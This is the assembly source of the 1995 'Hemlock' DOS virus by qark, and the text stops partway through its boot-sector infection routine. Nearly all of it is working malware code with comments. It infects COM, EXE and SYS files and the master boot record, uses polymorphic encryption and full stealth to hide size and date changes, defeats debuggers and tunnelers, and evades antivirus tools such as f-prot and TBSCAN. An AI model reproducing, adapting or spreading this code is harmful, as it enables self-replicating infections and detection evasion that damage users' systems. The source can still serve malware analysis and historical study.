Hemlock Virus Source Code

1. ;
2. ;                      Hemlock Virus Source by qark
3. ;                      +--------------------------+
4. ;
5. ;  Origin:      Australia, February 1995
6. ;  Targets:     COM/EXE/SYS/MBR/BS
7. ;  Polymorphic: Yes
8. ;  Encrypted:   Yes
9. ;  Stealth:     Full stealth as it redirects reads to infected bootsectors
10. ;               and will return a clean copy if an infected file is read.
11. ;  Armoured:    Attempting to trace int 21h or int 13h by a debugger/tunneler
12. ;               will be disabled or cause a system hang.
13. ;  Tunneling:   No, but checks for fixed ROM BIOS entry points by examining
14. ;               code in segment F000.  If found will set the vectors to these
15. ;               instead of the original vectors.
16. ;  Damage:      None
17. ;  Assembler:   A86 v3.71
18. ;  Other stuff: Disables stealth when the following programs are run PKZIP,
19. ;               LHA, ARJ, CHKDSK, NDD and SCANDISK.  When WIN or TBSCAN are
20. ;               executed, command line options are added to avoid detection.
21. ;               When CTRL-ALT-DEL (warm boot) is pressed, the virus will
22. ;               copy the original interrupt table back and call int 19h
23. ;               which will effectively mimic a warm boot.  If the computer
24. ;               is in protected mode it will call a normal reboot instead.
25. ;               If DOSDATA.SYS (a QEMM driver) is detected a different
26. ;               routine will be used for grabbing int21h when loading from
27. ;               boot.  Because SYS infection is unstable the virus does not
28. ;               go resident, but instead checks to see if the MBR is infected
29. ;               and if clean, infects it.  The polymorphism is simple in that
30. ;               it basically swaps around lines of the decryption, but no
31. ;               simple signature will detect it.
32. ;
33. ;       This is probably the best virus to ever come from Australia.
34. ;
35. ;       Hemlock is the poison that killed Socrates and the way I figure it,
36. ;       what's good for one greek philosopher is good enough for another.
37. ;
38.  
39.         org     0
40.  
41.         db      9 dup (90h)             ;This is setup for the polymorphism.
42. enc_loop:
43.         db      15 dup (90h)            ;18
44.         mov     si,offset enc_end + 100h
45. enc_start:
46.         sub     si,offset enc_end        
47.  
48.         cld                             ;Forward movement.
49.  
50.         mov     ax,0efbeh
51.         mov     bl,9
52.         int     13h                     ;Check if we are already home...
53.  
54.         cmp     ax,0BEEFh
55.         je      resident
56.  
57.         ;AX=01BE because of the error code passed into AH
58.         ;This will kill f-prot.
59.         add     word ptr cs:[si+offset jmp_off],ax
60.  
61.         db      0ebh,0                  ;Clear prefetch        
62.  
63.         db      0e9h                    ;JMP xxxx
64. jmp_off dw      6 - 01beh       ;01BE=The return size from the int13 call.
65. bogus_end:
66.         mov     ax,4c00h
67.         int     21h
68.         db      20h
69. real_continue:
70.         sub     word ptr cs:[si+offset jmp_off],ax
71.  
72.         call    check_mbr               ;Is the MBR infected with our virus ?
73.         je      mbr_done
74.         call    setrom15_13
75.         call    infect_mbr
76.         call    reset15_13
77.  
78. mbr_done:
79.         push    ds                      ;Save PSP
80.  
81.         mov     ax,es
82.         dec     ax                      ;MCB segment.
83.         xor     di,di                   ;Zero DI
84.        
85.         mov     ds,ax
86.  
87.         ;Using [DI] is smaller than [0], saves a byte or two.
88.         ;Thanx to Memory Lapse for that optimisation.
89.  
90.         cmp     byte ptr [di],'Z'       ;DI=0 Check MCB type.
91.         jne     pop_resident
92.  
93.         sub     word ptr [di+3],(offset mem_size /16) +1
94.         sub     word ptr [di+12h],(offset mem_size /16) +1
95.         mov     ax,word ptr [di+12h]    ;Our segment into AX.
96.         mov     es,ax
97.  
98.         push    cs
99.         pop     ds                      ;DS=CS
100.         mov     cx,offset end_virus     ;Our virus length.
101.         rep     movsb                   ;Move our virus in memory.
102.  
103.         sub     si,di                   ;SI points to our virus start again.
104.  
105.         push    si
106.  
107.         mov     ds,cx                   ;DS=CX=0
108.         mov     si,21h*4                ;Set int 21
109.         mov     di,offset i21
110.         movsw
111.         movsw
112.         mov     word ptr [si-4],offset int21handler
113.         mov     word ptr [si-2],es
114.  
115.         mov     si,13h*4                ;Set int 13
116.         mov     di,offset i13
117.         movsw
118.         movsw
119.         mov     word ptr [si-4],offset int13handler
120.         mov     word ptr [si-2],es
121.  
122.         mov     byte ptr es:flag21,1
123.        
124.         pop     si
125.  
126. pop_resident:
127.         pop     ds              ;Restore PSP
128. resident:
129.         push    ds
130.         pop     es
131.  
132.         cmp     byte ptr cs:[si+offset filetype],'E'
133.         je      exe_return
134.         ;COM file return.
135.         mov     di,100h         ;Offset of COM start.
136.         push    di              ;Where we return to.
137.         add     si,offset header
138.         mov     cx,18h
139.         rep     movsb           ;Move the original header back.
140.         ret                     ;IP -> 100h
141.  
142. exe_return:
143.         mov     ax,ds           ;DS=PSP
144.         add     ax,10h          ;10H = size of PSP
145.         add     word ptr cs:[si+jump+2],ax      ;Fix the return JMP FAR
146.         cli
147.         mov     sp,word ptr cs:[si+offset header + 10h]
148.         add     ax,word ptr cs:[si+offset header + 0eh]
149.         mov     ss,ax           ;SS:SP now fixed
150.         sti
151.         xor     ax,ax
152.         xor     bx,bx
153.         xor     si,si
154.        
155.         db      0ebh,0          ;JMP $+2  Just clear the prefetch.
156.  
157.         db      0eah            ;Return to original EXE.
158. jump    dd      0      
159.  
160. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
161. ;Infected device drivers call this when they execute.
162. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
163. SysEntry:
164.         push    bp                      ;<--This turns into our RET later on.
165.  
166.         push    bp                      ;Save BP.
167.  
168.         mov     bp,sp                   ;Get the SP to change the stack.
169.  
170.         push    si                      ;Save our other stuff.
171.         push    ax
172.  
173.         db      0beh                    ;MOV SI,xxxx
174. delta_sys       dw      0               ;Our delta offset.
175.  
176.         mov     ax,cs:[si+offset sysreturn]     ;The address of the orig
177.                                                 ;handler.
178.  
179.         mov     word ptr [bp+2],ax      ;'RET' to the original routine.
180.         mov     word ptr cs:[6],ax      ;Restore the original pointer
181.                                         ;so that we aren't called again.
182.  
183.         ;Do the stuff you want to here.... push and pop tho
184.         push    bx
185.         mov     ax,0efbeh               ;Residency test
186.         xor     bx,bx
187.         int     13h
188.         pop     bx
189.        
190.         cmp     ax,0beefh               ;If resident then exit.
191.         je      sys_res
192.  
193.         call    check_mbr
194.         je      sys_res
195.        
196.         call    setrom15_13
197.         call    infect_mbr
198.         call    reset15_13
199.  
200. Sys_Res:
201.         pop     ax
202.         pop     si
203.         pop     bp
204.         ret             ;It will return to the handler that was supposed to
205.                         ;be called instead of this one.
206.  
207. SysReturn       dw      0               ;The original strategy routine.
208.  
209. ;End of the stub part of the virus...
210. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
211. ;Beginning of the resident routines...
212. Int21Handler    Proc    Near
213. ;;;;;;
214. ;Instead of the good old CMP AH,XX to check for the DOS function, I think
215. ;that I'll bung in a cooleo little jump table... always good to try new
216. ;tricks...
217. ;;;;;;
218.  
219.         call    anti_tunnel                     ;Stop all other tunneling.
220.  
221.         push    si
222.         push    ax
223.  
224.         mov     si,offset function_table        ;SI=My little jump table.
225.         cld
226. Index_function:
227.         cmp     si,offset end_table             ;End of table...
228.         je      not_viral
229.         db      2eh                             ;CS:
230.         lodsb
231.         cmp     ah,al                           ;Do the functions match ?
232.         je      do_jump
233.         inc     si                              ;I would use lodsw but that
234.         inc     si                              ;would destroy AH.
235.         jmp     index_function
236. do_jump:
237.         db      2eh                             ;CS:
238.         lodsw
239.         jmp     ax
240.  
241. not_viral:
242.         jmp     pop_end
243.  
244.         ;Below is the virus entry jump table.
245.  
246. function_table  db      11h                     ;Dir ffirst
247.                 dw      offset dir_stealth
248.                 db      12h                     ;Dir ffnext
249.                 dw      offset dir_stealth
250.                 db      3dh                     ;Open
251.                 dw      offset file_open
252.                 db      3fh                     ;File read
253.                 dw      offset file_read
254.                 db      43h                     ;Attribute change
255.                 dw      offset file_infect
256.                 db      4bh                     ;Execute
257.                 dw      offset file_infect
258.                 db      4eh                     ;Handle ffirst
259.                 dw      offset find_stealth
260.                 db      4fh                     ;Handle fnext
261.                 dw      offset find_stealth
262.                 db      56h                     ;Rename
263.                 dw      offset file_infect
264.                 db      57h                     ;Date and time
265.                 dw      offset file_time
266.                 db      6ch                     ;Open
267.                 dw      offset file_open
268. end_table:
269.  
270. ;.................
271. File_Read:              ;3F arrives here.
272.         pop     ax
273.         pop     si
274.        
275.         cmp     byte ptr cs:stealth,0
276.         je      no_read_stealth
277.  
278.         call    check_handle
279.         jnc     good_handle
280.  
281. no_read_stealth:
282.         jmp     jend                    ;Outta here...
283. good_handle:
284.  
285.         push    es
286.         push    di
287.         call    get_sft
288.         jc      toobig
289.         call    check_years
290.         jae     stealth_read
291. toobig:
292.         pop     di                      ;Uninfected, so dont stealth.
293.         pop     es
294.         jmp     jend                    ;The push/pops are equal everywhere..
295.  
296.         file_pointer    dw      0
297.  
298. stealth_read:
299.         ;We've already reduced the file size within the SFT, (in file_open)
300.         ;so if they lseek to the end to try and find the virus they won't
301.         ;reach it, so all we have to do is make sure if they are reading
302.         ;near the header that we stealth it.  Not too hard is it ? :)
303.         ;The header is only the first 18h bytes so we only mess with that.
304.  
305.         cmp     word ptr es:[di+17h],0
306.         jne     toobig
307.         cmp     word ptr es:[di+15h],18h
308.         jae     toobig
309.  
310.         push    word ptr es:[di+15h]    ;Save the current file pointer
311.         pop     word ptr cs:file_pointer
312.        
313.         pop     di
314.         pop     es
315.  
316.  
317.         call    Int21norm                       ;Do their read.
318.         jnc     ok_read
319.         jmp     bad_read
320. ok_read:
321.         push    ax
322.         push    bx
323.         push    cx
324.         push    dx
325.         push    si
326.         push    di
327.         push    es
328.         pushf
329.  
330.         mov     ax,word ptr cs:file_pointer
331.  
332.         ;We want to overwrite whats at the current file pointer with
333.         ;what is supposed to be there.  To do this we must work out
334.         ;whether it has read past the header, or just inside the header.
335.  
336.         call    get_sft
337.         jnc     good_read_sft
338.         jmp     bad_read_sft
339. good_read_sft:
340.         add     ax,cx
341.         jc      large_read              ;Reading near FFFF bytes
342.         cmp     ax,18h
343.         jbe     calc_read               ;Read past the header
344. large_read:
345.         sub     ax,cx
346.         mov     cx,18h
347.         sub     cx,ax
348.         jmp     short long_read
349. calc_read:
350.         sub     ax,cx
351. long_read:              ;AX=File pointer, CX=bytes to read.
352.  
353.         ;Save the current file pointer.
354.         push    word ptr es:[di+17h]
355.         push    word ptr es:[di+15h]
356.  
357.         ;Save the current file length
358.         push    word ptr es:[di+13h]
359.         push    word ptr es:[di+11h]
360.  
361.         ;Extend the file length to include the virus
362.  
363.         add     word ptr es:[di+11h],offset end_virus
364.         adc     word ptr es:[di+13h],0
365.  
366.         push    word ptr es:[di+11h]    ;File size --> File pointer
367.         pop     word ptr es:[di+15h]
368.         push    word ptr es:[di+13h]
369.         pop     word ptr es:[di+17h]
370.  
371.         sub     word ptr es:[di+15h],18h        ;Headersize back
372.         sbb     word ptr es:[di+17h],0
373.  
374.         add     word ptr es:[di+15h],ax         ;Add on their file pointer
375.         adc     word ptr es:[di+17h],0
376.  
377.         mov     al,3fh
378.         call    int21h             ;Will read into their buffer the orig shit
379.  
380.         pop     word ptr es:[di+11h]    ;Restore file length
381.         pop     word ptr es:[di+13h]
382.  
383.         pop     word ptr es:[di+15h]    ;Restore file pointer
384.         pop     word ptr es:[di+17h]
385. bad_read_sft:
386.         popf
387.         pop     es
388.         pop     di
389.         pop     si
390.         pop     dx
391.         pop     cx
392.         pop     bx
393.         pop     ax
394. bad_read:
395.        
396. read_exit:
397.         retf    2
398. ;.................
399. File_Open:              ;3D and 6C arrive here.
400.         pop     ax
401.         pop     si
402.         call    infect                  ;Infect the file.
403.         call    Int21norm               ;Do their open  
404.         jc      exit_open
405.         pushf
406.         xchg    bx,ax
407.         call    check_handle
408.         xchg    bx,ax
409.         jc      good_exit_open
410.  
411.         push    es
412.         push    di
413.         xchg    bx,ax                   ;File handle into BX
414.         call    get_sft
415.         xchg    bx,ax
416.         jc      pop_open_exit
417.  
418.         call    check_years
419.         jb      pop_open_exit           ;Is it infected ? Nope, outta here..
420.  
421.         cmp     byte ptr cs:stealth,0
422.         je      pop_open_exit
423.  
424. ;Remove our virus size from the SFT.  This means that if they try to lseek
425. ;to the end of the infected program they will see no size difference, and
426. ;they will only be able to reach the end of the normal file.
427. ;We no longer have to worry about them reading in the virus body from the end
428. ;of the file, we only have to protect the header at the start.
429.  
430.         sub     word ptr es:[di+11h],offset end_virus
431.         sbb     word ptr es:[di+13h],0
432.  
433. pop_open_exit:
434.         pop     di
435.         pop     es
436. good_exit_open:
437.         popf
438. exit_open:
439.         retf    2
440. ;.................
441. File_Infect:            ;43, 4B and 56 arrive here.
442.         pop     ax
443.         pop     si
444.  
445.         cmp     ax,4b00h                ;File execute ?
446.         jne     non_execute
447.  
448.         mov     byte ptr cs:stealth,1   ;Turn stealth on.
449.         call    check_names             ;This may turn stealth off.
450.         call    infect
451.         call    int21norm               ;Do the interrupt
452.         mov     byte ptr cs:stealth,1   ;Turn stealth on.
453.         retf    2                       ;Exit interrupt.
454. non_execute:
455.         call    infect                  ;Infect it.
456. far_time_exit:
457.         jmp     jend
458. ;.................
459. File_Time:              ;57 arrives here.
460.                                 ;Hide the 100 years marker.
461.         pop     ax
462.         pop     si
463.  
464.         cmp     byte ptr cs:stealth,0
465.         je      far_time_exit
466.  
467.         cmp     al,01
468.         je      far_time_exit
469.  
470.         call    Int21norm       ;Call it
471.         pushf
472.         jc      time_ok
473.         cmp     dh,200
474.         jb      time_ok
475.  
476.         sub     dh,200          ;Take away the 100 years.
477.        
478. time_ok:
479.         popf
480.         retf    2
481. ;.................
482. Dir_Stealth:            ;11 and 12 arrive here.
483. ;No change in size during a DIR listing.
484.        
485.         pop     ax
486.         pop     si
487.  
488.         cmp     byte ptr cs:stealth,0
489.         je      far_time_exit
490.        
491.         call    Int21norm                       ;Call the interrupt
492.         cmp     al,0                            ;straight off.
493.         jne     end_of_dir
494.  
495.         push    es
496.         push    ax                              ;Save em.
497.         push    bx
498.  
499.         mov     al,2fh                          ;Get DTA address.
500.         call    int21h
501.  
502.         cmp     byte ptr es:[bx],0ffh           ;Extended FCB ?
503.         jne     not_extended
504.  
505.         add     bx,7                            ;Add the extra's.
506. not_extended:
507.         mov     al,byte ptr es:[bx+1ah]         ;Move high date
508.         cmp     al,200
509.         jb      dir_pop                         ;Not ours to play with.
510.  
511.         sub     al,200                          ;Restore to original date.
512.  
513.         mov     byte ptr es:[bx+1ah],al
514.  
515.         ;Subtract the file length.
516.         sub     word ptr es:[bx+1dh],offset end_virus
517.         sbb     word ptr es:[bx+1fh],0
518. dir_pop:
519.         pop     bx
520.         pop     ax
521.         pop     es
522.  
523. end_of_dir:
524.  
525.         iret
526.  
527. stealth_exit:
528.         jmp     jend            ;Exit.
529. ;.................
530. Find_Stealth:           ;4E and 4F arrive here.
531.  
532.         pop     ax
533.         pop     si
534.  
535.         cmp     byte ptr cs:stealth,0
536.         je      stealth_exit
537.  
538.         call    Int21norm       ;Do the original find call.
539.         jc      end_search
540.  
541.         pushf
542.         push    es
543.         push    bx
544.         push    si
545.  
546.         mov     al,2fh          ;Get DTA address
547.         call    int21h
548.  
549.         mov     al,byte ptr es:[bx+19h]
550.         cmp     al,200          ;Get the file year from the DTA
551.         jb      search_pop
552.  
553.         sub     al,200          ;Set it back to the normal year.
554.  
555.         mov     byte ptr es:[bx+19h],al ;Now they won't spot us!
556.  
557.         ;Subtract the file length.
558.         sub     word ptr es:[bx+1ah],offset end_virus
559.         sbb     word ptr es:[bx+1ch],0
560.  
561. search_pop:
562.         pop     si
563.         pop     bx
564.         pop     es
565.         popf
566. end_search:
567.         retf    2                       ;IRET without POPF
568. ;.................
569. Far_End:                                ;Gotta use a lame one of these
570.                                         ;because of the 128 byte jump :(
571.         jmp     no_extension
572.  
573. ;Infect EXE/COM/SYS
574. Infect:                                
575.         push    ax
576.         push    bx
577.         push    cx
578.         push    dx
579.         push    si
580.         push    di
581.         push    ds
582.         push    es
583.         push    bp
584.  
585.         xor     bp,bp                   ;Zero BP for anti-heuristics
586.  
587.         cmp     ah,6ch
588.         jne     no_si_fixup
589.         mov     dx,si                   ;Function 6C stores the name at
590.                                         ;DS:SI instead of DS:DX.
591. no_si_fixup:
592.         cld
593.         push    ds
594.         pop     es
595.         mov     al,'.'
596.         mov     di,dx
597.         mov     cx,128
598.         repne   scasb                   ;Search for extension.
599.  
600.         jne     far_end
601.  
602.         mov     byte ptr cs:filetype,0  ;Reset the filetype flag
603.  
604.         mov     si,di
605.         lodsw
606.         or      ax,2020h                ;Convert to lowercase.
607.         cmp     ax,'oc'                 ;COM
608.         jne     chk_exe
609.         lodsb
610.         or      al,20h
611.         cmp     al,'m'
612.         jne     far_end
613.         jmp     good_name
614. chk_exe:                        ;EXE
615.         cmp     ax,'xe'
616.         jne     chk_sys
617.         lodsb
618.         or      al,20h
619.         cmp     al,'e'
620.         jne     far_end
621.         jmp     good_name
622. chk_sys:                        ;SYS
623.         cmp     ax,'ys'
624.         jne     far_end
625.         lodsb
626.         or      al,20h
627.         cmp     al,'s'
628.         jne     far_end
629.         mov     byte ptr cs:filetype,'S'
630. good_name:
631.         lea     ax,[bp+3dh]             ;Same as mov ax,3d but anti-heuristic
632.         call    int21h
633.         jc      far_end
634.         xchg    bx,ax                   ;This is smaller than XCHG AX,BX
635.                                         ;BX=File handle.
636.  
637.         call    set_int24
638.  
639.         call    get_sft
640.         jc      sys_close_exit
641.         call    check_years             ;Is it already infected ?
642.         ja      sys_close_exit
643.        
644.         mov     word ptr es:[di+2],2    ;Change file to read/write.
645.  
646.         push    cs
647.         pop     es                      ;ES=CS
648.         lea     ax,[bp+3fh]             ;Same as MOV AX,3F
649.         push    cs
650.         pop     ds                      ;DS=CS
651.         mov     cx,1ch                  ;Read in the full EXE header.
652.         mov     dx,offset header
653.         call    int21h
654.  
655.         mov     si,offset header
656.         lodsw                           ;AX=First two bytes of header.
657.  
658. ;I DO NOT want to infect SYS files that have an EXE header because
659. ;that means I will infect shit like QEMM and DOSDATA, which will fuck
660. ;everything up...
661.  
662.         cmp     byte ptr cs:filetype,'S'
663.         je      sys_infect
664.  
665.         add     al,ah
666.         cmp     al,167                  ;Test for ZM/MZ
667.         jne     com_infect
668.         jmp     exe_infect
669.  
670. ;++++++++++++++++++++++
671. SYS_Infect:
672. ;Check first dword for -1 (-1 = 0ffffffffh)
673. ;SYS files mostly start with ffffffffh so its a good marker to check.
674.  
675.         inc     ax              ;AX=0 if SYS file
676.         jnz     sys_close_exit
677.         lodsw
678.         inc     ax
679.         jnz     sys_close_exit
680.         lodsw                   ;Same as INC SI, INC SI but one byte
681.  
682.         ;SI=Offset of 6 into the header.
683.         ;DS:SI=The SYS files strategy routine.
684.         lodsw                   ;Strategy routine offset into AX
685.         mov     word ptr sysreturn,ax
686.         call    lseek_end
687.         cmp     ax,60000
688.         je      sys_close_exit
689.         cmp     ax,1024
690.         jb      sys_close_exit
691.  
692.         call    get_date
693.  
694.         ;File length is in AX.
695.         mov     word ptr delta_sys,ax
696.         push    ax
697.         mov     al,40h                  ;Write virus at end.
698.         mov     cx,offset end_virus
699.         xor     dx,dx
700.         call    int21h
701.         pop     ax
702.         jc      sys_close_exit
703.  
704.         add     ax,offset sysentry
705.         mov     word ptr header+6,ax    ;Point the strategy routine at our
706.        
707.         ;lseek to start.
708.  
709.         call    lseek_start
710.  
711.         mov     al,40h                  ;Write our cooler header back.
712.         mov     dx,offset header
713.         mov     cx,18h
714.         call    int21h
715.         jc      sys_close_exit
716.  
717.         call    set_marker              ;Set the 100 year marker.
718. sys_close_exit:
719.         jmp     exe_close               ;Outta here !
720.  
721. ;+++++++++++++++++++++++
722. COM_Infect:                             ;This routine works with COM files.
723.  
724.         mov     byte ptr filetype,'C'
725.         call    lseek_end
726.         or      dx,dx                   ;Waaaay too big!
727.         jnz     com_close_exit
728.         cmp     ax,62300                ;Too big...
729.         ja      com_close_exit
730.         cmp     ax,1024                 ;Teensy weensy
731.         jb      com_close_exit
732.  
733.         call    get_date
734.  
735.         push    ax                      ;Save file size in AX
736.  
737.         add     ax,100h                 ;COM's start at 100h
738.         mov     delta,ax                ;Fixup the delta offset.
739.  
740.         call    setup_poly
741.  
742.         mov     al,40h                  ;Append virus.
743.         mov     dx,offset end_virus
744.         mov     cx,offset end_virus
745.         call    int21h
746.         pop     ax                      ;Restore file size.
747.         jc      com_close_exit          ;Failed write...
748.  
749.         sub     ax,3                    ;JMP takes 3 bytes.
750.         mov     word ptr virus_jump+1,ax        ;Our jump buffer is ready !
751.  
752.         call    lseek_start
753.  
754.         mov     al,40h                  ;Write our jump.
755.         mov     dx,offset virus_jump
756.         mov     cx,3
757.         call    int21h
758.         jc      com_close_exit          ;Failed write...
759.  
760.         call    set_marker              ;Set the 100 years marker.
761. com_close_exit:
762.         jmp     exe_close
763. ;+++++++++++++++++++++++
764. EXE_Infect:
765.         mov     byte ptr filetype,'E'
766.  
767.         dec     si
768.         dec     si                      ;SI = Offset header
769.  
770.         cmp     word ptr [si+1ah],0     ;Overlays are evil!
771.         jne     com_close_exit
772.         cmp     word ptr [si+18h],40h   ;So is windows shit!
773.         jae     com_close_exit
774.  
775.         call    get_date
776.  
777.         push    [si+2]                  ;Save pages
778.         push    [si+4]                  ;Save last page size
779.         push    [si+0ch]                ;Save maximum memory
780.         push    [si+0eh]                ;Save SS
781.         push    [si+10h]                ;Save SP
782.         push    [si+14h]                ;Save IP
783.         push    [si+16h]                ;Save CS
784.  
785.         mov     ax,word ptr [si+0ch]    ;Get Maxmem
786.         inc     ax                      ;If FFFF then don't change.
787.         jz      set_to_max
788.  
789.         ;We are doing this because when TBSCAN is run it checks it's segment
790.         ;size in memory.  If it is infected it will detect the virus because
791.         ;the memory allocated to it is more than it asked for.  So downsize
792.         ;maxmem by the virus paras and wow! passed sanity check!  Did you
793.         ;know that TBSCAN doesn't use it's 'OWN' file system to check
794.         ;itself ?  Nope, it uses DOS so you can stealth is easy enough.
795.  
796.         ;Note: I did not invent this idea!  A person who wishes to remain
797.         ;anonymous told it to me.
798.  
799.         sub     word ptr [si+0ch],offset end_virus / 16 +1
800.  
801. set_to_max:
802.  
803.         push    si
804.         add     si,14h
805.         mov     di,offset jump
806.         movsw
807.         movsw                           ;CS:IP into JUMP
808.         pop     si
809.  
810.         call    lseek_end
811.                                         ;DX:AX=File length
812.         push    dx                      ;Save file length.
813.         push    ax
814.  
815.         mov     cx,16                   ;Divide filesize by 16.
816.         div     cx                      ;Remainder = IP
817.                                         ;Answer = CS
818.  
819.         sub     ax,word ptr [si+8]      ;Subtract headersize.
820.         mov     word ptr delta,dx
821.  
822.         mov     word ptr [si+14h],dx    ;IP into header
823.         mov     word ptr [si+16h],ax    ;CS into header
824.  
825.         add     dx,offset end_virus + 1000      ;SP past end of file.
826.  
827.         mov     word ptr [si+0eh],ax    ;SS=CS
828.         mov     word ptr [si+10h],dx    ;SP past end of our virus.
829.  
830.         pop     ax
831.         pop     dx                      ;File length into DX:AX
832.  
833.         add     ax,offset end_virus
834.         adc     dx,0
835.        
836.         mov     cx,512
837.         div     cx
838.         or      dx,dx
839.         jz      no_page_fix             ;Page ends on 512 boundary.
840.         inc     ax                      ;Add the last page.
841. no_page_fix:
842.         mov     word ptr [si+4],ax
843.         mov     word ptr [si+2],dx
844.  
845.         call    lseek_start
846.  
847.         mov     dx,si                   ;DX=Offset header
848.         mov     cx,18h
849.         mov     al,40h                  ;Write header back.
850.         call    int21h
851.        
852.         pop     [si+16h]                ;Restore all the header stuff
853.         pop     [si+14h]                ;that I changed.
854.         pop     [si+10h]
855.         pop     [si+0eh]
856.         pop     [si+0ch]
857.         pop     [si+4]
858.         pop     [si+2]
859.  
860.         jc      exe_close
861.  
862.         call    lseek_end
863.  
864.         call    setup_poly
865.  
866.         mov     al,40h
867.         mov     dx,offset end_virus
868.         mov     cx,offset end_virus
869.         call    int21h
870.         jc      exe_close
871.  
872.         call    set_marker
873. exe_close:
874.         mov     al,3eh
875.         call    int21h
876.  
877.         call    reset_int24
878. no_extension:
879.         pop     bp
880.         pop     es
881.         pop     ds
882.         pop     di
883.         pop     si
884.         pop     dx
885.         pop     cx
886.         pop     bx
887.         pop     ax
888.         ret
889. ;.................       End of infection procedure...
890.  
891. pop_end:
892.         pop     ax
893.         pop     si
894.  
895. jend:
896.         db      0eah
897.         i21     dd      0
898.  
899. Int21Handler    EndP
900.  
901. Int21h:
902.         xchg    ah,al                   ;<-- swap AH and AL for heuristics.
903. Int21norm:
904.         pushf
905.         push    cs
906.         call    jend
907.         ret
908.  
909. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
910. Bootsector:
911.         ;This is what we write to the MBR/BS
912.         xor     ax,ax
913.         mov     es,ax
914.         mov     si,7c00h
915.         cli                             ;Ints off while changing
916.                                         ;stack.
917.         mov     ss,ax
918.         mov     sp,si
919.         sti
920.         mov     ds,ax
921.  
922.                                         ;CS,DS,ES,SS,AX=0    SI,SP=7C00H
923.  
924.         sub     word ptr [413h],8       ;3.5k for virus + 3.5k buffer
925.                                         ;+1K for IVT
926.                                         ;40:13 = memory.
927.         int     12h
928.  
929.         mov     cl,6
930.         shl     ax,cl
931.         mov     es,ax                   ;ES=Our virus segment.
932.  
933.         xor     ax,ax
934.         int     13h                     ;Reset Disk
935.  
936.         xor     dh,dh                   ;Head 0
937.         mov     cx,4                    ;From sector 4, track 0
938.         or      dl,dl
939.         js      hd_resident             ;>= 80h
940.        
941.         ;Self modifying code because the floppy disk storage track/head
942.         ;changes all the time.
943.  
944.         db      0b9h                    ;MOV CX,xxxx
945.         floppy_sect     dw      4
946.         db      0b6h                    ;MOV DH,xxxx
947.         floppy_head     db      0
948.  
949. hd_resident:
950.         xor     bx,bx                   ;Read to start of segment
951.         mov     ax,207h                 ;Read 7 sectors
952.         int     13h                     ;This ought to read the virus into
953.                                         ;our allocated buffer.
954.         jc      hd_resident
955.  
956.  
957.         mov     byte ptr es:flag21,0            ;Reset the int21 flag
958.         mov     byte ptr es:mz_counter,1        ;Reset exe counter
959.         mov     byte ptr es:qemm,0              ;Reset qemm flag
960.  
961.         mov     si,13h*4
962.         cld
963.         mov     di,offset i13
964.         movsw
965.         movsw
966.         mov     word ptr [si-4],offset int13handler
967.         mov     word ptr [si-2],es
968.  
969.         mov     si,9*4                          ;Set int9 to ours.
970.         mov     di,offset i9
971.         movsw
972.         movsw
973.         mov     word ptr [si-4],offset int9handler
974.         mov     word ptr [si-2],es
975.  
976.         xor     si,si                           ;Copy interrupt table.
977.         mov     di,offset IVT
978.         mov     cx,1024
979.         rep     movsb
980.  
981.         mov     si,449h
982.         movsb
983.  
984.         int     19h
985.                
986.         Marker  db      'Eu'                    ;Just a crap marker
987. BS_End:
988.  
989. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
990. ;;;
991. rend:
992.         retf    2
993. ;;;
994. multi:
995.         jmp     multipartite
996. ;;;
997. stealth_bs:
998.         mov     cx,3
999.         mov     ax,102h
1000.  
1001.         or      dl,dl
1002.         js      stealth_mbr             ;DL>=80H then goto stealthmbr
1003.  
1004.         mov     cx,14
1005.         mov     dh,1
1006. stealth_mbr:
1007.         call    int13h
1008.         jmp     bs_pop_end
1009. ;;;
1010. Int13Handler:
1011.  
1012.         call    anti_tunnel        
1013.  
1014.         xchg    ah,al
1015.        
1016.         cmp     al,2
1017.         jne     multi
1018.  
1019.         cmp     cx,1
1020.         jne     multi
1021.  
1022.         or      dh,dh
1023.         jnz     multi
1024.  
1025.         call    int13h
1026.         jc      rend
1027.  
1028.         pushf                           ;Save everything we mess with.
1029.         push    ax
1030.         push    bx
1031.         push    cx
1032.         push    dx
1033.         push    si
1034.         push    di
1035.         push    ds
1036.         push    es
1037.  
1038.         cmp     word ptr es:[bx+offset marker - offset bootsector],'uE'
1039.         je      stealth_bs
1040.  
1041.         mov     cx,3                    ;Orig HD MBR at sector 3.
1042.  
1043.         or      dl,dl                   ;Harddisk ?
1044.         js      write_orig              ;80H or above ?
1045.  
1046.         ;Calculate shit like track/head for floppy******
1047.         push    dx
1048.  
1049.         push    cs
1050.         pop     ds
1051.        
1052.         mov     ax,es:[bx+18h]          ;Sectors per track.
1053.         sub     es:[bx+13h],ax          ;Subtract a track.
1054.         mov     ax,es:[bx+13h]          ;AX=total sectors.
1055.         mov     cx,es:[bx+18h]          ;CX=sectors per track
1056.         xor     dx,dx
1057.         div     cx                      ;Total sectors/sectors per track
1058.  
1059.         xor     dx,dx
1060.         mov     cx,word ptr es:[bx+1ah] ;CX=heads
1061.         div     cx                      ;Total tracks/heads
1062.  
1063.         push    ax
1064.         xchg    ah,al                   ;AX=Track
1065.         mov     cl,6
1066.         shl     al,cl                   ;Top 2 bits of track.
1067.         or      al,1                    ;We'll use the first sector onward.
1068.         mov     word ptr floppy_sect,ax
1069.  
1070.         pop     ax
1071.         mov     cx,word ptr es:[bx+1ah] ;CX=heads
1072.         xor     dx,dx
1073.         div     cx                      ;Track/Total Heads
1074.  
1075.         mov     byte ptr floppy_head,dl ;Remainder=Head number
1076.  
1077.         mov     cx,14                   ;Floppy root directory.
1078.         pop     dx
1079.         mov     dh,1
1080.  
1081. write_orig:
1082.         mov     ax,103h
1083.         call    int13h
1084.         jc      bs_pop_end
1085.  
1086.         push    es
1087.         pop     ds
1088.  
1089.         mov     si,bx
1090.         push    cs
1091.         pop     es                      ;ES=CS
1092.         mov     cx,510                  ;Move original sector to our buffer.
1093.         cld
1094.         mov     di,offset end_virus
1095.         rep     movsb
1096.        
1097.         mov     ax,0aa55h               ;End of sector marker.
1098.         stosw
1099.  
